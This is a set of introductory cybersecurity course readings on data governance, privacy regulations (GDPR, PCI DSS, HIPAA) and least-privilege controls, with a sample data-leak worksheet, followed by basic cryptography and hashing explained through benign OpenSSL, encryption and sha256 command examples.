can be vulnerable whether it is at rest, in use, or in transit. Regardless of the state it is in, information
should be kept private by limiting access and authorization.
In security, data vulnerabilities are often mapped in a model known as the data lifecycle. Each stage of
the data lifecycle plays an important role in the security controls that are put in place to maintain the
CIA triad of information. In this reading, you will learn about the data lifecycle, the plans that determine
how data is protected, and the specific types of data that require extra attention.
The data lifecycle
The data lifecycle is an important model that security teams consider when protecting information. It
influences how they set policies that align with business objectives. It also plays an important role in the
technologies security teams use to make information accessible.
In general, the data lifecycle has five stages. Each describes how data flows through an organization from
the moment it is created until it is no longer useful:
● Collect
● Store
● Use
● Archive
● Destroy
Protecting information at each stage of this process includes keeping it accessible and
recoverable should something go wrong.
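As a rough sketch, the five stages can be modeled as an ordered sequence. Real lifecycles are not always strictly linear (data often moves between storage and use repeatedly), so this is only an illustration:

```python
# Hypothetical sketch: the five data lifecycle stages as an ordered sequence.
LIFECYCLE = ["collect", "store", "use", "archive", "destroy"]

def next_stage(current):
    """Return the stage that follows the current one, or None after destroy."""
    index = LIFECYCLE.index(current)
    return LIFECYCLE[index + 1] if index + 1 < len(LIFECYCLE) else None

print(next_stage("store"))    # 'use'
print(next_stage("destroy"))  # None — destroyed data has no next stage
```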
Data governance
Businesses handle massive amounts of data every day. New information is constantly being collected
from internal and external sources. A structured approach to managing all of this data is the best way to
keep it private and secure.
Data governance is a set of processes that define how an organization manages information. Governance
often includes policies that specify how to keep data private, accurate, available, and secure throughout
its lifecycle.
Effective data governance is a collaborative activity that relies on people. Data governance policies
commonly categorize individuals into a specific role:
● Data owner: the person that decides who can access, edit, use, or destroy their information.
● Data custodian: anyone or anything that's responsible for the safe handling, transport, and
storage of information.
● Data steward: the person or group that maintains and implements data governance policies set
by an organization.
Businesses store, move, and transform data using a wide range of IT systems. Data governance policies
often assign accountability to data owners, custodians, and stewards.
Note: As a data custodian, you will primarily be responsible for maintaining security and privacy rules
for your organization.
Protecting data at every stage
Most security plans include a specific policy that outlines how information will be managed across an
organization. This is known as a data governance policy. These documents clearly define procedures
that should be followed to participate in keeping data safe. They place limits on who or what can access
data. Security professionals are important participants in data governance. As a data custodian, you will
be responsible for ensuring that data isn’t damaged, stolen, or misused.
Legally protected information
Data is more than just a bunch of 1s and 0s being processed by a computer. Data can represent
someone's personal thoughts, actions, and choices. It can represent a purchase, a sensitive medical
decision, and everything in between. For this reason, data owners should be the ones deciding whether
or not to share their data. As a security professional, you must always respect a person's data
privacy decisions.
Securing data can be challenging. In large part, that's because data owners generate more data than they
can manage. As a result, data custodians and stewards sometimes lack direct, explicit instructions on
how they should handle specific types of data. Governments and other regulatory agencies have bridged
this gap by creating rules that specify the types of information that organizations must protect by
default:
● Personally identifiable information (PII) is any information used to infer an individual's
identity, including information that can be used to contact or locate someone.
● PHI stands for protected health information. In the U.S., it is regulated by the Health Insurance
Portability and Accountability Act (HIPAA), which defines PHI as "information that relates to the
past, present, or future physical or mental health or condition of an individual." In the EU, PHI
has a similar definition but is regulated by the General Data Protection Regulation (GDPR).
● SPII is a specific type of PII that falls under stricter handling guidelines. The S stands for
sensitive, meaning this is a type of personally identifiable information that should only be
accessed on a need-to-know basis, such as a bank account number or login credentials.
Overall, it's important to protect all types of personal information from unauthorized use and disclosure.
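A simple way to picture these categories is a classification table that marks which fields require stricter, need-to-know handling. The field names and labels here are hypothetical:

```python
# Hypothetical sketch: classifying data fields by sensitivity category.
CLASSIFICATION = {
    "name": "PII",
    "mailing_address": "PII",
    "diagnosis_code": "PHI",
    "bank_account_number": "SPII",
    "login_credentials": "SPII",
}

def requires_need_to_know(field):
    """SPII should only be accessible on a need-to-know basis."""
    return CLASSIFICATION.get(field) == "SPII"

print(requires_need_to_know("bank_account_number"))  # True
print(requires_need_to_know("name"))                 # False
```

A real data governance program would attach handling rules (encryption, retention, access logging) to each category; the lookup above only shows the classification step.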
Key takeaways
Keeping information private has never been so important. Many organizations have data governance
policies that outline how they plan to protect sensitive information. As a data custodian, you will play a
key role in keeping information accessible and safe throughout its lifecycle. There are various types of
information and controls that you’ll encounter in the field. As you continue through this course, you’ll
learn more about major security controls that keep data private.
Information privacy: Regulations and
compliance
Security and privacy have a close relationship. As you may recall, people have the right to control how
their personal data is collected and used. Organizations also have a responsibility to protect the
information they are collecting from being compromised or misused. As a security professional, you will
be highly involved in these efforts.
Previously, you learned how regulations and compliance reduce security risk. To review, refer to the
reading about how security controls, frameworks, and compliance regulations are used together to
manage security and minimize risk. In this reading, you will learn how information privacy regulations
affect data handling practices. You'll also learn about some of the most influential security regulations in
the world.
Information security vs. information privacy
Security and privacy are two terms that often get used interchangeably outside of this field. Although the
two concepts are connected, they represent specific functions:
● Information privacy refers to the protection of data from unauthorized access and distribution.
● Information security (InfoSec) refers to the practice of keeping data in all states away from
unauthorized users.
The key difference: Privacy is about providing people with control over their personal information and
how it's shared. Security is about protecting people’s choices and keeping their information safe from
potential threats.
For example, a retail company might want to collect specific kinds of personal information about its
customers for marketing purposes, like their age, gender, and location. How this private information will
be used should be disclosed to customers before it's collected. In addition, customers should be given an
option to opt-out if they decide not to share their data.
Once the company obtains consent to collect personal information, it might put specific security
controls in place to protect that private data from unauthorized access, use, or disclosure. The company
should also have security controls in place to respect the privacy of all stakeholders and anyone who
chose to opt-out.
Note: Privacy and security are both essential for maintaining customer trust and brand reputation.
Why privacy matters in security
Data privacy and protection are topics that started gaining a lot of attention in the late 1990s. At that
time, tech companies suddenly went from processing people’s data to storing and using it for business
purposes. For example, if a user searched for a product online, companies began storing and sharing
access to information about that user’s search history with other companies. Businesses were then able
to deliver personalized shopping experiences to the user for free.
Eventually this practice led to a global conversation about whether these organizations had the right to
collect and share someone’s private data. Additionally, the issue of data security became a greater
concern; the more organizations collected data, the more vulnerable it was to being abused, misused, or
stolen.
Many organizations became more concerned about the issues of data privacy. Businesses became more
transparent about how they were collecting, storing, and using information. They also began
implementing more security measures to protect people's data privacy. However, without clear rules in
place, protections were inconsistently applied.
Note: The more data is collected, stored, and used, the more vulnerable it is to breaches and threats.
Notable privacy regulations
Businesses are required to abide by certain laws to operate. As you might recall, regulations are rules set
by a government or another authority to control the way something is done. Privacy regulations in
particular exist to protect a user from having their information collected, used, or shared without their
consent. Regulations may also describe the security measures that need to be in place to keep private
information away from threats.
Three of the most influential industry regulations that every security professional should know about
are:
● General Data Protection Regulation (GDPR)
● Payment Card Industry Data Security Standard (PCI DSS)
● Health Insurance Portability and Accountability Act (HIPAA)
GDPR
GDPR is a set of rules and regulations developed by the European Union (EU) that puts data owners in
total control of their personal information. Under GDPR, types of personal information include a
person's name, address, phone number, financial information, and medical information.
The GDPR applies to any business that handles the data of EU citizens or residents, regardless of where
that business operates. For example, a US-based company that handles the data of EU visitors to its
website is subject to the GDPR's provisions.
PCI DSS
PCI DSS is a set of security standards formed by major organizations in the financial industry. This
regulation aims to secure credit and debit card transactions against data theft and fraud.
HIPAA
HIPAA is a U.S. law that requires the protection of sensitive patient health information. HIPAA prohibits
the disclosure of a person's medical information without their knowledge and consent.
Note: These regulations influence data handling at many organizations around the world even though
they were developed by specific nations.
Several other security and privacy compliance laws exist. Which ones your organization needs to follow
will depend on the industry and the area of authority. Regardless of the circumstances, regulatory
compliance is important to every business.
Security assessments and audits
Businesses should comply with important regulations in their industry. Doing so validates that they
have met a minimum level of security while also demonstrating their dedication to maintaining data
privacy.
Meeting compliance standards is usually a continual, two-part process of security audits and
assessments:
● A security audit is a review of an organization's security controls, policies, and procedures
against a set of expectations.
● A security assessment is a check to determine how resilient current security implementations
are against threats.
For example, if a regulation states that multi-factor authentication (MFA) must be enabled for all
administrator accounts, an audit might be conducted to check those user accounts for compliance. After
the audit, the internal team might perform a security assessment that determines many users are using
weak passwords. Based on their assessment, the team could decide to enable MFA on all user accounts
to improve their overall security posture.
Note: Compliance with legal regulations, such as GDPR, can be determined during audits.
As a security analyst, you are likely to be involved with security audits and assessments in the field.
Businesses usually perform security audits less frequently, approximately once per year. Security audits
may be performed both internally and externally by different third-party groups.
In contrast, security assessments are usually performed more frequently, about every three-to-six
months. Security assessments are typically performed by internal employees, often as preparation for a
security audit. Both evaluations are incredibly important ways to ensure that your systems are
effectively protecting everyone's privacy.
Key takeaways
A growing number of businesses are making it a priority to protect and govern the use of sensitive data
to maintain customer trust. Security professionals should think about data and the need for privacy in
these terms. Organizations commonly use security assessments and audits to evaluate gaps in their
security plans. While it is possible to overlook or delay addressing the results of an assessment, doing so
can have serious business consequences, such as fines or data breaches.
Hello, my name is Heather and I'm the Vice President of Security Engineering at Google. PII is
everywhere. It's a fundamental part of how we are all working online all the time. If you are using online
resources, you are probably putting your PII out there somewhere. There's some of your PII that lots of
people know, such as your name. And then there's sensitive data that you don't want very many people
to know, such as your bank account number or your private medical health information. And so, we
make these distinctions often because this kind of information needs to be handled differently.
Everything that we do now, from school to voting, to registering our car happens online. And because of
that, it's so important that we have safety built-in by default into all our systems. Here's some tips. You
should always encrypt the data as much as you can when it's being stored at rest. And secondly, when
it's transmitting over the Internet, we always want to encrypt it using TLS or SSL. Third, within your
company, you should think very clearly about who has access to that data. It should be almost no one if
it's very sensitive. And in the rare cases where somebody does need to access that data, there should be
a record of that access, who accessed it, and a justification as to why. And you should have a program to
look at the audit records for that data. The most important thing to remember is if you have a situation
where PII has been compromised, remember that's someone's personal information and your response
wants to be grounded in that reality. They need to be able to trust the infrastructure, the systems, the
websites, the devices. They need to be able to trust the experience they're having. For me, that's the
mission: To help keep billions of people safe online every day.
Activity Overview
In this activity, you will review the results of a data risk assessment. You will determine whether
effective data handling processes are being implemented to protect information privacy.
Data is among the most valuable assets in the world today. Everything from intellectual property to
guest WiFi networks should be protected with a combination of technical, operational, and managerial
controls. Implementing the principle of least privilege is essential to protect information privacy.
Be sure to complete this activity before moving on. The next course item will provide you with a
completed exemplar to compare to your own work.
Scenario
Review the following scenario. Then complete the step-by-step instructions.
You work for an educational technology company that developed an application to help teachers
automatically grade assignments. The application handles a wide range of data that it collects from
academic institutions, instructors, parents, and students.
Your team was alerted to a data leak of internal business plans on social media. An investigation by the
team discovered that an employee accidentally shared those confidential documents with a customer.
An audit into the leak is underway to determine how similar incidents can be avoided.
A supervisor provided you with information regarding the leak. It appears that the principle of least
privilege was not observed by employees at the company during a sales meeting. You have been asked
to analyze the situation and find ways to prevent it from happening again.
First, you'll need to evaluate details about the incident. Then, you'll review the controls in place to
prevent data leaks. Next, you'll identify ways to improve information privacy at the company. Finally,
you'll justify why you think your recommendations will make data handling at the company more
secure.
Link to template: Data leak worksheet
Step 2: Analyze the situation
The principle of least privilege is a fundamental security control that helps maintain information
privacy. However, least privilege starts to lose its effectiveness when too many users are given access to
information. Data leaks commonly happen as information gets passed between people without
oversight.
To start your analysis, review the following incident summary provided by your supervisor:
A customer success representative received access to a folder of internal documents from a manager. It
contained files associated with a new product offering, including customer analytics and marketing
materials. The manager forgot to unshare the folder. Later, the representative copied a link to the
marketing materials to share with a customer during a sales call. Instead, the representative shared a
link to the entire folder. During the sales call, the customer received the link to internal documents and
posted it to their social media page.
After reviewing the summary, write 20-60 words (2-3 sentences) in the Issue(s) row of the Data leak
worksheet describing the factors that led to the data leak.
Step 3: Review current data privacy controls
Data leaks are a major risk due to the amount of data handled by the application. The
company used the NIST Cybersecurity Framework (CSF) to develop their plan for
addressing their information privacy concerns.
Review the Security plan snapshot resource of the worksheet. Then, review the NIST SP
800-53: AC-6 resource of the worksheet.
After, write 20-60 words (2-3 sentences) in the Review row of the Data leak worksheet to
summarize what you've learned about NIST SP 800-53: AC-6.
Step 4: Identify control enhancements
The company's implementation of least privilege is based on NIST Special Publication 800-53 (SP 800-53). NIST developed SP 800-53 to provide businesses with a customizable
information privacy plan. It's a comprehensive resource that describes a wide range of
control categories, including least privilege.
Use the NIST SP 800-53: AC-6 resource to determine two control enhancements that might
have prevented the data leak. List the two improvements in the Recommendation(s) row of
the worksheet.
Step 5: Justify your recommendations
At the end of your analysis, it's time to communicate your findings to your supervisor. It's
important to justify your recommendations so that the supervisor can relay this
information to other decision makers at the company.
Consider the issues you identified earlier. Then, write 20-60 words (2-3 sentences) in the
Justification row describing why you think the control enhancements you recommend will
reduce the likelihood of another data leak.
What to Include in Your Response
Be sure to address the following elements in your completed activity:
● 2-3 sentences analyzing the factors that led to the incident
● 2-3 sentences summarizing NIST SP 800-53: AC-6
● 2 control enhancement recommendations to improve least privilege
● 2-3 sentences justifying your recommendations
NIST SP 800-53: AC-6
NIST developed SP 800-53 to provide businesses with a customizable information privacy plan. It's a
comprehensive resource that describes a wide range of control categories. Each control provides a few key
pieces of information:
● Control: A definition of the security control.
● Discussion: A description of how the control should be implemented.
● Control enhancements: A list of suggestions to improve the effectiveness of the control.
AC-6 Least Privilege
Control:
Only the minimal access and authorization required to complete a task or function should
be provided to users.
Discussion:
Processes, user accounts, and roles should be enforced as necessary to achieve least
privilege. The intention is to prevent a user from operating at privilege levels higher than
what is necessary to accomplish business objectives.
Control enhancements:
● Restrict access to sensitive resources based on user role.
● Automatically revoke access to information after a period of time.
● Keep activity logs of provisioned user accounts.
● Regularly audit user privileges.
Data leak worksheet
Incident summary: A sales manager shared access to a folder of internal-only documents with their team
during a meeting. The folder contained files associated with a new product that has not been publicly
announced. It also included customer analytics and promotional materials. After the meeting, the manager
did not revoke access to the internal folder, but warned the team to wait for approval before sharing the
promotional materials with others.
During a video call with a business partner, a member of the sales team forgot the warning from their
manager. The sales representative intended to share a link to the promotional materials so that the
business partner could circulate the materials to their customers. However, the sales representative
accidentally shared a link to the internal folder instead. Later, the business partner posted the link on their
company's social media page assuming that it was the promotional materials.
Control: Least privilege

Issue(s): Access to the internal folder was not limited to the sales team and the manager. The
business partner should not have been given permission to share the promotional information to
social media.

Review: NIST SP 800-53: AC-6 addresses how an organization can protect their data privacy by
implementing least privilege. It also suggests control enhancements to improve the effectiveness of
least privilege.

Recommendation(s):
● Restrict access to sensitive resources based on user role.
● Regularly audit user privileges.

Justification: Data leaks can be prevented if shared links to internal files are restricted to
employees only. Also, requiring managers and security teams to regularly audit access to team files
would help limit the exposure of sensitive information.
Fundamentals of Cryptography
The internet is an open, public system with a lot of data flowing through it. Even though we all send
and store information online, there's some information that
we choose to keep private. In security, this type of data is known
as personally identifiable information. Personally identifiable information, or
PII, is any information that can be used to infer an individual's identity. This can include things like
someone's name, medical and financial information, photos,
emails, or fingerprints. Maintaining the privacy of PII online is difficult. It takes the right security
controls to do so. One of the main security controls used to protect information online is
cryptography. Cryptography is the process of transforming information into a form that unintended
readers can't understand. Data of any kind is kept secret using a two-step process: encryption to
hide the information, and decryption to unhide it. Imagine sending an email to a friend. The process
starts by taking data in its original and readable form, known as plaintext. Encryption takes that
information and scrambles it into an unreadable form, known as ciphertext. We then use
decryption to unscramble the ciphertext back into plaintext form, making it readable again. Hiding
and unhiding private information is a practice that's been around for a long time. Way before
computers! One of the earliest cryptographic methods is known as Caesar's cipher. This method is
named after a Roman general, Julius Caesar, who ruled the Roman empire near the end of the first
century BC. He used it to keep messages between him and his military generals private. Caesar's
cipher is a simple algorithm
that works by shifting letters in the Roman alphabet forward by a fixed number of spaces. An
algorithm is a set of rules that solve a problem. Specifically in cryptography, a cipher is an algorithm
that encrypts information. For example, a message encoded with Caesar's cipher using a shift of 3
would encode an A as a D, a B as an E, a C as an F, and so on. In this example, you could send a friend
a message that said, "hello" using a shift of 3, and it would read "khoor." Now, you might be
wondering how you would know which shift a message encrypted with Caesar's cipher is using. The
answer is that you need the key! A cryptographic key is a mechanism that decrypts ciphertext. In
our example, the key would tell you that my message is encrypted by 3 shifts. With that
information, you can unlock the hidden message! Every form of encryption relies on both a cipher
and key to secure the exchange of information. Caesar's cipher is not widely used today because of a
couple of major flaws. One concerns the cipher itself. The other relates to the key. This cipher relies
entirely on the characters of the Roman alphabet to hide information. For example, consider a
message written using the English alphabet, which is only 26 characters. Even without the key, it's
simple to crack a message secured with Caesar's cipher by trying all 25 possible shifts. In
information security, this tactic is known as brute force attack, a trial-and-error process of
discovering private information. The other major flaw of Caesar's cipher is that it relies on a single
key. If that key was lost or stolen, there's nothing stopping someone from accessing private
information. Properly keeping track of cryptographic keys is an important part of security. To start,
it's important to ensure that these keys are not stored in public places, and to share them
separately from the information they will decrypt. Caesar's cipher is just one of many algorithms
used to protect people's privacy. Due to its limitations, we rely on more complex algorithms to
secure information online. Our next focus is exploring how modern algorithms work to keep
information private.
Public Key Infrastructure
Computers use a lot of encryption algorithms to send and store information online. They're all
helpful when it comes to hiding private information, but only as long as their keys are protected.
Can you imagine having to keep track of the encryption keys protecting all of your personal
information online? Neither can I, and we don't have to, thanks to something known as public key
infrastructure. Public key infrastructure, or PKI, is an encryption framework that secures the
exchange of information online. It's a broad system that makes accessing information fast, easy, and
secure. So, how does it all work? PKI is a two-step process. It all starts with the exchange of
encrypted information. This involves either asymmetric encryption, symmetric encryption, or both.
Asymmetric encryption involves the use of a public and private key pair for encryption and
decryption of data. Let's imagine this as a box that can be opened with two keys. One key, the public
key, can only be used to access the slot and add items to the box. Since the public key can't be used
to remove items, it can be copied and shared with people all around the world to add items. On the
other hand, the
second key, the private key, opens the box fully, so that the items inside can be removed. Only the
owner of the box has access to the private key that unlocks it. Using a public key allows the people
and servers you're communicating with to see and send you encrypted information
that only you can decrypt with your private key. This two-key system makes asymmetric
encryption a secure way to exchange information online; however, it also slows
down the process. Symmetric encryption, on the other hand, is a faster and simpler
approach to key management. Symmetric encryption involves the use of a single secret key to
exchange information. Let's imagine the locked box again. Instead of two keys, symmetric
encryption uses the same key. The owner can use it to open the box, add items, and close it again.
When they want to share access, they can give the secret key to anyone else to do the same.
Exchanging a single secret key may make web communications faster, but it also makes it less
secure. PKI uses both asymmetric and symmetric encryption, sometimes in conjunction with one
another. It all depends on whether speed or security is the priority. For example, mobile chat
applications use asymmetric encryption to establish a connection
between people at the start of a conversation when security is the priority. Afterwards, when the
speed of communications back-and-forth is the priority, symmetric encryption takes over. While
both have their own strengths and weaknesses, they share a common vulnerability, establishing
trust between the sender and receiver. Both processes rely on sharing keys that can be misused,
lost, or stolen. This isn't a problem when we exchange information in person because we can use
our senses to tell the difference between those we trust and those we don't trust. Computers, on the
other hand, aren't naturally equipped to make this distinction. That's where the second step of PKI
applies. PKI addresses the vulnerability of key sharing by establishing trust using a system of digital
certificates between computers and networks. A digital certificate is a file that verifies the identity of
a public key holder. Most online information is exchanged using digital certificates. Users,
companies, and networks hold one and exchange them when communicating information online as
a way of signaling trust. Let's look at an example of how digital certificates are created. Let's say an
online business is about to launch their website, and they want to obtain a digital certificate. When
they register their domain, the hosting company sends certain information over to a trusted
certificate authority, or CA. The information provided is usually basic things like the company name
and the country where its headquarters are located. A public key for the site is also provided. The
certificate authority then uses this data to verify the company's identity. When it's confirmed, the
CA encrypts the data with its own private key. Finally, they create a digital certificate that contains
the encrypted company data. It also contains the CA's digital signature to prove that it's authentic.
Digital certificates are a lot like a digital ID badge that's used online to restrict or grant access to
information. This is how PKI solves the trust issue. Combined with asymmetric and symmetric
encryption, this two-step approach to exchanging secure information between trusted sources is
what makes PKI such a useful security control.
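The certificate mechanics described above can be sketched with OpenSSL. In this example a self-signed certificate stands in for one issued by a trusted CA, and the file names (`key.pem`, `cert.pem`) and subject fields (`Example Shop`, `example.test`) are made up for illustration:

```shell
# Generate an RSA key pair and a self-signed certificate in one step.
# In practice a trusted CA would verify the company's details and sign the
# certificate; here the site signs its own, which is enough to inspect the
# moving parts.
openssl req -x509 -newkey rsa:2048 -nodes \
  -keyout key.pem -out cert.pem -days 365 \
  -subj "/C=US/O=Example Shop/CN=example.test"

# Inspect the fields a CA would have verified: the subject (who the
# certificate belongs to) and the issuer (who signed it).
openssl x509 -in cert.pem -noout -subject -issuer
```

For a self-signed certificate, the subject and issuer are identical; a CA-issued certificate would show the CA as the issuer instead.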
Symmetric and asymmetric encryption
Previously, you learned these terms:
● Encryption: the process of converting data from a readable format to an encoded format
● Public key infrastructure (PKI): an encryption framework that secures the exchange of online information
● Cipher: an algorithm that encrypts information
All digital information deserves to be kept private, safe, and secure. Encryption is one key to doing that!
It is useful for transforming information into a form that unintended recipients cannot understand. In
this reading, you’ll compare symmetric and asymmetric encryption and learn about some well-known
algorithms for each.
Types of encryption
There are two main types of encryption:
● Symmetric encryption is the use of a single secret key to exchange information. Because it uses one key for encryption and decryption, the sender and receiver must know the secret key to lock or unlock the cipher.
● Asymmetric encryption is the use of a public and private key pair for encryption and decryption of data. It uses two separate keys: a public key and a private key. The public key is used to encrypt data, and the private key decrypts it. The private key is only given to users with authorized access.
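The symmetric case can be sketched with OpenSSL's `enc` command. The passphrase and message here are arbitrary examples, and `-pbkdf2` (available in OpenSSL 1.1.1 and later) derives the AES key from the passphrase:

```shell
# Symmetric encryption: one shared secret both protects and reveals the data.
secret="s3cret-passphrase"
printf 'meet me at noon' |
  openssl enc -aes-256-cbc -pbkdf2 -pass "pass:$secret" -base64 > message.enc

# Anyone holding the same secret key can decrypt the message.
openssl enc -d -aes-256-cbc -pbkdf2 -pass "pass:$secret" -base64 < message.enc
```

Note that passing secrets with `pass:` on the command line is convenient for a demonstration but exposes them to other local processes; real deployments read keys from protected files or key stores.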
The importance of key length
Ciphers are vulnerable to brute force attacks, which use a trial and error process to discover private
information. This tactic is the digital equivalent of trying every number in a combination lock trying to
find the right one. In modern encryption, longer key lengths are considered to be more secure. Longer
key lengths mean more possibilities that an attacker needs to try to unlock a cipher.
One drawback to having long encryption keys is slower processing times. Although short key lengths are
generally less secure, they’re much faster to compute. Providing fast data communication online while
keeping information safe is a delicate balancing act.
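The combination-lock analogy becomes concrete with Caesar's cipher, whose key space is tiny. A short bash sketch can try every shift against the "khoor" example from earlier in a fraction of a second:

```shell
# Brute force attack on Caesar's cipher: try all 25 possible shifts.
# Each candidate decryption maps a rotated alphabet back onto a-z.
alphabet=abcdefghijklmnopqrstuvwxyz
ciphertext=khoor
for shift in $(seq 1 25); do
  rotated="${alphabet:$shift}${alphabet:0:$shift}"
  candidate=$(printf '%s' "$ciphertext" | tr "$rotated" "$alphabet")
  echo "shift $shift: $candidate"
done
# The shift-3 line reads "hello" -- the key is recovered by exhaustion.
```

An attacker scanning this output for readable English finds the plaintext immediately, which is exactly why modern ciphers use keys with billions upon billions of possibilities instead of 25.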
Approved algorithms
Many web applications use a combination of symmetric and asymmetric encryption. This is how they
balance user experience with safeguarding information. As an analyst, you should be aware of the most
widely-used algorithms.
Symmetric algorithms
● Triple DES (3DES) is known as a block cipher because of the way it converts plaintext into ciphertext in “blocks.” Its origins trace back to the Data Encryption Standard (DES), which was developed in the early 1970s. DES was one of the earliest symmetric encryption algorithms that generated 64-bit keys. A bit is the smallest unit of data measurement on a computer. As you might imagine, Triple DES generates keys that are 192 bits, or three times as long. Despite the longer keys, many organizations are moving away from using Triple DES due to limitations on the amount of data that can be encrypted. However, Triple DES is likely to remain in use for backwards compatibility purposes.
● Advanced Encryption Standard (AES) is one of the most secure symmetric algorithms today. AES generates keys that are 128, 192, or 256 bits. Cryptographic keys of this size are considered to be safe from brute force attacks. It’s estimated that brute forcing an AES 128-bit key could take a modern computer billions of years!
Asymmetric algorithms
● Rivest Shamir Adleman (RSA) is named after its three creators who developed it while at the Massachusetts Institute of Technology (MIT). RSA is one of the first asymmetric encryption algorithms that produces a public and private key pair. Asymmetric algorithms like RSA produce even longer key lengths. In part, this is due to the fact that these functions are creating two keys. RSA key sizes are 1,024, 2,048, or 4,096 bits. RSA is mainly used to protect highly sensitive data.
● Digital Signature Algorithm (DSA) is a standard asymmetric algorithm that was introduced by NIST in the early 1990s. DSA also generates key lengths of 2,048 bits. This algorithm is widely used today as a complement to RSA in public key infrastructure.
Generating keys
These algorithms must be implemented when an organization chooses one to protect their data. One
way this is done is using OpenSSL, which is an open-source command line tool that can be used to
generate public and private keys. OpenSSL is commonly used by computers to verify digital certificates
that are exchanged as part of public key infrastructure.
Note: OpenSSL is just one option. There are various others available that can generate keys with any of
these common algorithms.
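A minimal key-generation sketch with OpenSSL follows; the file names `private.pem` and `public.pem` are arbitrary choices for this example:

```shell
# Generate a 2048-bit RSA private key.
openssl genrsa -out private.pem 2048

# Derive the shareable public key from the private key.
openssl rsa -in private.pem -pubout -out public.pem

# Sanity-check the private key's internal consistency (prints "RSA key ok").
openssl rsa -in private.pem -check -noout
```

The private key file must be kept secret and readable only by its owner, while `public.pem` can be distributed freely, which mirrors the locked-box analogy from the PKI discussion.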
In early 2014, OpenSSL disclosed a vulnerability, known as the Heartbleed bug, that exposed sensitive
data in the memory of websites and applications. Although unpatched versions of OpenSSL are still
available, the Heartbleed bug was patched later that year (2014). Many businesses today use the secure
versions of OpenSSL to generate public and private keys, demonstrating the importance of using up-to-date software.
Obscurity is not security
In the world of cryptography, a cipher must be proven to be unbreakable before claiming that it is
secure. According to Kerckhoffs's principle, cryptography should be designed in such a way that all the
details of an algorithm—except for the private key—should be knowable without sacrificing its security.
For example, you can access all the details about how AES encryption works online and yet it is still
unbreakable.
Occasionally, organizations implement their own, custom encryption algorithms. There have been
instances where those secret cryptographic systems have been quickly cracked after being made public.
Pro tip: A cryptographic system should not be considered secure if it requires secrecy around how it
works.
Encryption is everywhere
Companies use both symmetric and asymmetric encryption. They often work as a team, balancing
security with user experience.
For example, websites tend to use asymmetric encryption to secure small blocks of data that are
important. Usernames and passwords are often secured with asymmetric encryption while processing
login requests. Once a user gains access, the rest of their web session often switches to using symmetric
encryption for its speed.
Using data encryption like this is increasingly required by law. Regulations like the Federal Information
Processing Standards (FIPS 140-3) and the General Data Protection Regulation (GDPR) outline how data
should be collected, used, and handled. Achieving compliance with either regulation is critical to
demonstrating to business partners and governments that customer data is handled responsibly.
Key takeaways
Knowing the basics of encryption is important for all security professionals. Symmetric encryption relies
on a single secret key to protect data. On the other hand, asymmetric uses a public and private key pair.
Their encryption algorithms create different key sizes. Both types of encryption are used to meet
compliance regulations and protect data online.
Activity: Decrypt an encrypted message
Introduction
In this lab, you'll complete a series of tasks to obtain instructions for decrypting an encrypted file.
Encryption of data in use, at rest, and in transit is critical to security functions. You'll use the Linux skills
you have learned to uncover the clues needed to decode a classical cipher, restore a file, and reveal a
hidden message.
What you’ll do
You have multiple tasks in this lab:
● List the contents of a directory
● Read the contents of files
● Use Linux commands to revert a classical cipher back to plaintext
● Decrypt an encrypted file and restore the file to its original state
Non-repudiation and hashing
Security professionals are always thinking about vulnerabilities. It's how we stay ahead of threats.
We've spent some time together exploring a couple forms of encryption. The two types we've
discussed produce keys that are shared when communicating information. Encryption keys are
vulnerable to being lost or stolen, which can put sensitive
information at risk. Let's explore another security control that helps companies address this
weakness. A hash function is an algorithm that produces a code that can't be decrypted. Unlike
asymmetric and symmetric algorithms, hash functions are one-way processes
that do not generate decryption keys. Instead, these algorithms produce a unique
identifier known as a hash value, or digest. Here's an example to demonstrate this. Imagine a
company has an internal application that is used by employees and is stored in a shared drive. After
passing through a hashing function, the program receives its hash value. For example purposes, we
created this relatively short hash value with the MD5 hashing function. Generally, standard hash
functions that produce longer hashes are preferred for being more secure. Next, let's imagine an
attacker replaces the program with a modified version that performs malicious actions. The
malicious program may work like the original. However, if so much as one line of
code is different from the original, it will produce a different hash value. By comparing the hash
values, we can validate that the programs are different. Attackers use tricks like this often
because they're easily overlooked. Fortunately, hash values help us identify when something like
this is happening. In security, hashes are primarily used to determine the integrity of files and
applications. Data integrity relates to the accuracy and consistency of information. This is known
as non-repudiation, the concept that authenticity of information can't be denied. Hash functions are
important security controls that make proven data integrity possible. Analysts use them frequently.
One way to do this is by finding the hash value of files or applications and comparing them against
known malicious files. For example, we can use the Linux command
line to generate the hash value for any file on your computer. We just launch a shell and type the
name of the hashing algorithm we want to use. In this case, we're using
a common one known as sha256. Next, we need to enter the file
name of any file we want to hash. Let's hash the contents of newfile.txt. Now, we'll press Enter. The
terminal generates this
unique hash value for the file. These values can be compared with
the hash values of known online viruses. One such database is VirusTotal. This is a popular tool
among security
practitioners that's useful for analyzing suspicious files, domains,
IPs, and URLs. As we've explored, even the slightest
change in input results in a totally different hash value. Hash functions are intentionally designed
this way to assist with matters of non-repudiation. They equip computers with a quick and
easy way to compare input and output values and validate data integrity.
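The terminal steps described above can be reproduced anywhere `sha256sum` is available. The file `newfile.txt` and its contents are stand-ins created for this sketch:

```shell
# Create a file and hash it, mirroring the terminal walkthrough above.
printf 'This is our file content.\n' > newfile.txt
h1=$(sha256sum newfile.txt | cut -d' ' -f1)
echo "$h1"

# Change a single character and hash again: the digest changes completely.
printf 'This is our file content!\n' > newfile.txt
h2=$(sha256sum newfile.txt | cut -d' ' -f1)
echo "$h2"
```

Comparing the two 64-character digests shows the avalanche behavior the video describes: a one-character edit produces an entirely different hash value.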
The evolution of hash functions
Hash functions are important controls that are part of every company's security strategy. Hashing is
widely used for authentication and non-repudiation, the concept that the authenticity of information
can’t be denied.
Previously, you learned that hash functions are algorithms that produce a code that can't be decrypted.
Hash functions convert information into a unique value that can then be used to determine its integrity.
In this reading, you’ll learn about the origins of hash functions and how they’ve changed over time.
Origins of hashing
Hash functions have been around since the early days of computing. They were originally created as a
way to quickly search for data. Since the beginning, these algorithms have been designed to represent
data of any size as small, fixed-size values, or digests. Using a hash table, which is a data structure that's
used to store and reference hash values, these small values became a more secure and efficient way for
computers to reference data.
One of the earliest hash functions is Message Digest 5, more commonly known as MD5. Professor Ronald
Rivest of the Massachusetts Institute of Technology (MIT) developed MD5 in the early 1990s as a way to
verify that a file sent over a network matched its source file.
Whether it’s used to convert a single email or the source code of an application, MD5 works by
converting data into a 128-bit value. You might recall that a bit is the smallest unit of data measurement
on a computer. Bits can either be a 0 or 1. In a computer, bits represent user input in a way that
computers can interpret. In a hash table, this appears as a string of 32 characters. Altering anything in
the source file generates an entirely new hash value.
